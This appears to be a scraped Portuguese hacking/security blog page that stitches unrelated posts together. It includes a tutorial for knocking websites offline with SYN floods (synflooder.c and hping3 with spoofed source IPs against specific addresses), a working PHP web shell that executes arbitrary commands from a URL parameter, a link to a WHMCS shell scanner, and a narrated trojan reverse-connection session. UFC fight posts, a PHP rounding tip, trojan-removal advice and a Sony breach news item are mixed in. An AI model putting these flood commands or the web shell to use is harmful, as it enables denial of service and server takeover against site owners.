WHMCS Simple Scanner

Boa tarde pessoal, me apresento como Kernel, mais um colunista da segurancaemrede.com.

E como primeira postagem, venho compartilhar um simples scanner que fiz em shell script, utiliza-se do google para busca de sistemas whmcs atraves de dorks e tambem detecta possiveis php-shells instalada neste sistema.

Portanto de codigo fonte aberto, pode ser modificado e customizado.

Link: http://inj3ct0rs.com/exploits/18150

Aproveitem.

By Kernel

como tirar um site do ar hacker

como tirar um site do ar hacker – Introdução ao ataque com synflooder.c
Iae galera, vou demostrar como realizar um ataque SYN Flood pra derrubar sites (hosts), quem não conhece muito SYN Flood, recomendo que leia mais sobre o mesmo.

Eu usarei 2 metodos para realizar o ataque, um será  usando a ferramenta synflooder.c outro sera usando o hping3 para tirar um site do ar(hacker)

Você pode baixar o hping no link abaixo:
synflooder.c —> http://www.4shared.com/file/119205535/bd36c580/SYN_Floodertar.html
hping —> http://www.hping.org/download.html

Obs: Para quem usa Debian, é muito fácil de instalar basta digitar:
# apt-get install hping3

Para quem usa OpenSUSE basta digitar:
# yast install hping3

Para quem usa Fedora basta digitar:
# yum install hping3
——————————————————————————————-

Agora o primeiro passo para realizar o ataque com o synflooder.c é compila-lo:
# gcc  synflooder.c -o synflooder

Obs: geralmente as pessoas reclaman de dar erro na compilação, uns merda… Pois, basta pegar algumas biblilhotecas que estarão faltando em alguns casos.

# ./synflooder

Gimme: ./synflooder <host> <port>
# ./synflooder 189.23.199.200 80

Connected No: 0
Connected No: 1
Connected No: 2
Connected No: 3
Connected No: 4
Connected No: 5
Connected No: 6
Connected No: 7
Connected No: 8
Connected No: 9
Connected No: 10
Connected No: 11
Connected No: 12
Connected No: 13
Connected No: 14
Connected No: 15
Connected No: 16

Depois de um tempo o site ficara impossibilitado de receber mais conexões e qualquer pessoa que tentar entrar no site, simplesmente não ira conseguir.

Obs: na minha opniao este ataque serve somente para passar medo em alguma pessoa, pois o servidor so fica fora do ar por alguns minutinhos básicos.
———————————————————————————————

ataque com HPING3

O hping3 é um programa muito util, pode ser usado para manipular o cabeçalho TCP/IP. Sera exatamente isto que vamos fazer, primeiro vamos spoofar o IP e floodar o alvo.

Atacando
O comando usado sera este:
hping3 –flood –syn -a ip_falso -e “Message” -S -s porta ip_alvo

Então no konsole vamos fazer assim:
#hping3 –flood –syn -a 123.123.123.123 -e “Dreamexplo” -S -s 80 201.40.22.164

O resultado sera que o alvo ira ficar OFF:
# hping3 –flood –syn -a 123.123.123.123 -e “Dreamexplo” -S -s 80 201.40.22.164

HPING 201.40.22.164  (ppp0 201.40.22.164): S set, 40 headers + 16 data bytes

[main] memlockall(): Success

Warning: can’t disable memory paging!

hping in flood mode, no replies will be shown

———————————————————————————————–

Espero que tenham gostado do tutorial.

ESTE FOI O TUTORIAL PRATICO. VOU CRIAR AGORA O TUTORIAL ESPLICATIVO QUE É O MAIS IMPORTANTE.

assistir luta brock lesnar vs alistair overeem video

Essa é uma das melhores lutas  do ufc, dois lutadores fortes

 

Brock Edward Lesnar  é um lutador de MMA e ex-campeão dos pesos-pesados do UFC, título que perdeu ao ser derrotado por Cain Velasquez no UFC 121, além de ser um ex-lutador de wrestling profissional e amador. Lesnar é mais conhecido por ser um ex-campeão da WWE. Por seu grande tamanho e força, é conhecido também como o “Urso Americano”.

Alistair Cees Overeem (Hounslow, 17 de maio de 1980) é um kickboxer e lutador de MMA holandês nascido na Inglaterra. É o atual campeão peso-pesado do Strikeforce, campeão interino peso-pesado do DREAM e campeão do K-1 World Grand Prix, e único lutador da história a ser detentor de um título mundial de um evento de MMA e do K-1 (kickboxing) ao mesmo tempo.

Esse vídeo aqui da vontade de pular no tempo até o 30 de Dezembro para ver o que vai dar esse choque de titãs, essa colisão de búfalos no UFC 141: a tatuagem escandalosa, Brock Lesnar vs o corpo King Kong, Alistair Overeem.

Só destacar a frase de Overeem:

“I’m gonna tear this guy apart… piece by pice”

“Vou rasgar esse cara… peça por peça”

profissional de segurança da informacao

Equipe especializada e profissional de segurança da informaca, ter uma equipe desta  é muito importante nos dias de hoje, pois os crackers estão a solta e nossa equipe de seguranca m rede pode cuidar de sua seguranca na web, pois somos uma equipe de especialistas em segurança da informação na web.

Por favor entren no link:

http://www.segurancaemrede.com/2011/11/especialistas-em-seguranca-da-informacao/

e Veja nossas promoções para a seguranca de seu site, sistema, software em geral.

FORMAS DE PAGAMENTO

PAYPAL ou PAGSEGURO -> nosso usuario é o mesmo nas duas contas:  juancarloscunha606@hotmail.com

como criar uma shell em php

Hoje vamos demostrar como criar uma shell em php, que é uma das melhores formas de efetuar comandos no servidor. o intuito deste tutorial é ensinar o que é realmente uma shell, criando uma shell simples.

O que é SHELL

Shell script é uma linguagem de script usada em vários sistemas operativos (operacionais), com diferentes dialetos, dependendo do interpretador de comandos utilizado. Um exemplo de interpretador de comandos é o bash, usado na grande maioria das distribuições GNU/Linux.

 Como criar uma SHELL em php

Existem varios tipos de shell, mas hoje vamos criar uma para executarmos comandos arbitrarios  em sistemas operacionais linux e windows.

<?php

//aqui eu crio o layout do formulario
print ‘
    <form method=”get” action=”">
        <input type=”text” name=”comando” />  <input type=”submit” name=exec” />
    </form>
<p>&nbsp;</p>‘; //aqui pulo uma linha

if(isset($_GET['comando'])){ //validação: si existe um comando executado
    $comando        =$_GET['comando']; //pega este comando
    print shell_exec($comando);    //executa no servidor
}
?>

Uma pessoa me perguntou, si era possivel criar uma shell em php. para informar o ip auvo e o nom comando a ser executado.

Reposta: Não é possivel fazer isso, pois cada caso é um caso. Eu posso criar uma shell para explorar uma falha de um determinado auvo, porem outro auvo provavelmente não tenha a mesma falha.

video junior dos santos cigano vs cain velasquez ufc mma

video junior dos santos cigano vs cain velasquez ufc mma – Aqui vamos estar disponibilizando o video do cain velasquez vs junior dos santos, mas por enguanto não temos o video si contente com os videos abaixo:

Um breve documentário das vidas dos dois principais pesos pesados da atualidade: Cain Velasquez e Junior Dos Santos.

Conheça mais da vida privada do Cigano ou da preparação física do Velasquez para essa grande luta que decidirá quem é o cara nos pesos pesados do UFC e do MMA.

Muito bom o momento onde a mãe de Cigano fala sobre como ele não gostava de brigar quando era pequeno ou quando Cigano conta quanto ganhava nos seus primeiros trampos.

O lado de Velasquez também não é mole não: família muito trabalhadora e humilde que foi para os EEUU procurando uma melhor vida… e deu certo.

Só contando os minutos para que chegue essa grande luta de MMA.

funcao round para arredondar valor em php

funcao round para arredondar valor em php – Hoje será isso que iremos ensinar ensinar, como arredondar valores com a funcao round

Agora para arredondar grandes valores basta colocar a funcao round

O codigo abaixo retorna um numero grande.

echo (11500*11)/7;    //retorna      18071.428571429

Agora com a funcao round retona o valor arredondado.

echo round((11500*11)/7); //18071

virgula(valorDouble(round($resultado/$numero_parcelas)));

TITULO:    funcao round para arredondar valor em php

By: http://www.segurancaemrede.com

retirar formulario para comentários no wordpress, proteger de spam no wordpress

Existem algumas formas de retirar formulario para comentários no wordpress e ao mesmo tempo se proteger de spam no wordpress, umas das formas mais faceis é entrar no arquivo comments.php que estará dentro da pasta de seu template, ex: wp-content/themes/template.

Neste arquivo irá conter um codigo PARECIDO com o codigo abaixo:

<form action=”<?php echo get_option(‘siteurl’); ?>/wp-comments-post.php” method=”post” id=”commentform”>

Pode retirar TODO o codigo partindo deste codigo acima até você chegar no codigo abaixo:

</form>

Ainda não acabou.

Você excluiu o layout da area de comentarios, mas caso algum hackerzinho queira ele pode normalmente enviar mensagem usando um layout proprio.

Resumindo, você pode excluir o arquivo wp-comments-post.php.

By: http://www.segurancaemrede.com

Assunto: retirar formulario para comentários no wordpress

Tutorial como criar keyloggers no beast 2.0.7

Postei na categoria VIRUS Um tutorial de como criar keyloggers no beast 2.0.7 e agora estou postando um pedaço do tutorial anterior mais as FORMAS DE RETIRAR VIRUS MAIS EFICAZES. Para quem perguntou pra mim si eu poderia mostrar as imagens do trojan… Criei um post com a simulaçao real e verdadeira de um ataque usando trojan… Primeiramente eu mandei o trojan para a vitima com o trojan camuflado e comprensado para ninguém perceber, então quando a vitima executou o trojan, eu criei um trojan de conexão reversa(a vitima si conecta no invasor), e então eu já estava esperando a conexão reversa com o beast aberto e listando as conexões [SIN]. Quando a minha vitima clicou no trojan, depois de mais ou menos 10 segundos o computador dela si conectou em min.

Primeira coisa que eu fiz, foi listar todos os programas e pastas ativos na maquina alvo.

Eu também vi todos os processos da maquina alvo.

Depois, disso vi que não tinha nada pra mim pegar ou saber… Então pensei em fazer uma Baguncinha… Mandei uma mensagem de error para o computador da vitima dizendo que a maquina dela seria desligada em 2 minutos.

Eu fiz também uma coisa que eu acho muito tosca… Que é: chat, entre a vitima e o invasor…

Muito tosco, porem fiz porque precisava mostrar isso em um post no blog….

Então, quando o alvo do invasor descobriu que tinha um trojan na sua maquina ele começou a si desesperar. Pois alem de ter um trojan na sua maquina, o invasor estava conectado…

OBS: lembrando que isso só foi uma encenação ..  eu estava manejando os dois computadores…o do alvo e o do invasor

_________________________FIM_____________________

Quando você percebe que tem um invasor conectado na sua maquina, primeira coisa que eu aconselho a fazer, é manter-si calmo. Depois da calma, desconecte seu computador da internet, assim barraremos a conexão do invasor, si não saber desconectar, somente retire o cabo RJ-45(cabo de rede), para retirar os virus de seu computador.

Existem vários métodos para si retirar um vírus da sua máquina/PC, citarei aqui algumas das maneiras, sugiro que você pesquise mais sobre elas, enquanto eu não posto um post mais detalhado sobre cada assunto.

Métodos eficazes e os não tão eficazes de se retirar o programa
Basicamente existem quatro métodos de se retirar um cavalo de tróia. Cada um possui suas vantagens e falhas. O ideal seria usar um pouco de todos.

Detecção por portas
Esse é um método utilizado por programas como o Xôbobus, o meu Anti-Trojans e muitos outros. Funciona do seguinte modo: os programadores estudam as portas TCP e UDP utilizadas pelos trojans e criam um programa que abre essas portas. Assim, quando um invasor vir a porta aberta e pensar que é um cavalo de tróia que está instalado ali, cairá em uma armadilha tendo o seu endereço IP detectado. Esse método não é muito eficiente pois…Veja: http://www.invasao.com.br/2008/02/16/como-detectar-e-retirar-trojans-sem-precisar-de-anti-virus-e-firewalls/
facilmente podemos mudar as portas que os trojans utilizam. Mas ainda é um método muito usado pois muitas pessoas não se lembrar de trocar as portas.

Detecção pelo arquivo
Esse é o método usado pelos anti-vírus e o programa The Cleaner. Ele detecta o trojan checando a sua estrutura. Se o arquivo estiver renomeado (sem ser para executável) ou estiver comprimido, esse método se torna inútil. Para ser realmente eficaz, deve ser usado junto à detecção de portas. Assim, mesmo que seu anti-vírus não encontrou um trojan, o Anti-Trojans pode encontrar.

Detecção por string
Na minha opinião, o melhor método de todos. Pouco divulgado publicamente, se torna a melhor garantia para se detectar um trojan sem falhas. Isso porquê mesmo que o programa for comprimido ou mude suas portas, ele ainda estará usando uma das 65535 portas do sistema e
se comunicará com o cliente. A comunicação entre cliente e servidor se dá por uma string (texto) enviada. Por exemplo: O Netbus 1.7 envia uma string assim “Netbus 1.7x” quando alguma conexão é estabelecida. Se for o cliente, ele responderá com outra string. Então para analisar todas as portas do seu sistema e saber quais estão abertas e possuem strings, utilize um programa como o Chaoscan ou algum outro scanner de porta que lhe dê essas
informações.

Detecção manual
Muito eficaz também, a checagem manual do sistema pelo operador pode facilitar muito a vida. Olhando registro, arquivos de inicialização, conferindo os programas carregados na memória, o tamanho dos arquivos, etc… Todas essas precauções evitam dores de cabeça. Essa política adotada junto aos outros tipos de detecção faz com que você exclua em 100% a chance de uma invasão por cavalos de tróia.

RECOMENDO A VOCES PESQUISAREM MAIS SOBRE O ASSUNTO
Primeira, coisa que eu fiz para retirar esse vírus foi verificar cada processo em execução do computador, então percebi que tinha um arquivo diferente chamado… svchost1.exe.

Para quem não sabe ter informações dos processos ativos, vá em…

Iniciar->Todos os programas->Acessórios-> ferramentas do sistema->informações do sistema

OU, então somente vá em, iniciar -> executar -> e digite: msinfo32.exe.

Já dentro do programa do Windows, vá em inicialização e processos… Lá vai ter varias informações que podem ser úteis para pegar esse vírus.

Os trojan, costumam voltar depois que você exclui, então não basta você saber onde está o vírus e então exclui-lo, pois ele voltará.

Para ele não voltar você tem excluir todos os vestígios do trojan, que geralmente fica dentro da pasta…

C:recycler…………

C:windowsmsagent…….

C:windows…….

C:windowssystem32

Vá em iniciar -> executar -> digite: msconfig e de enter, vá na aba inicializar, lá estará todos os processos que são iniciados junto com o sistema operacional Windows.

Instale o anti-virus kaperskay no seu computador e  faça um escaneamento.

Concerteza pegará…

Si com tudo que você fizer o virus não sair(coisa impossível), então instale o avast profissional na sua maquina, pois tem vírus que o avast pega que o kaspersky não pega e assim vice e versa. Com todos os anti-virus.

Si mesmo assim não sair o vírus, então instale o the cleaner, pois os trojan tem muito medo deste programa(anti-trojan).

Agora, si você tentou de todos os modos e não saiu esse vírus, basta você formatar seu computador.

hacker rouba contas de usuarios da sony

Um invasor roubou US$ 1,2 mil em pontos virtuais das contas de usuários de um serviço online da Sony, segundo a agência de notícias “Reuters”. O hacker invadiu o So-Net, provedor de internet subsidiário da Sony Japão.

Por meio de nota, divulgada no site, o So-Net explicou que encerrou as trocas dos pontos, e pediu para os usuários trocaram suas senhas. O provedor não confirmou se também foram roubados dados pessoais dos usuários, como ocorreu na invasão do PlayStation Network, Qriocity e Sony Online Entertainment.

Contudo, os responsáveis pelo provedor confirmaram que o site foi acessado milhares de vezes do mesmo endereço de Internet Protocol (IP), indicando um possível ataque de força bruta de senhas.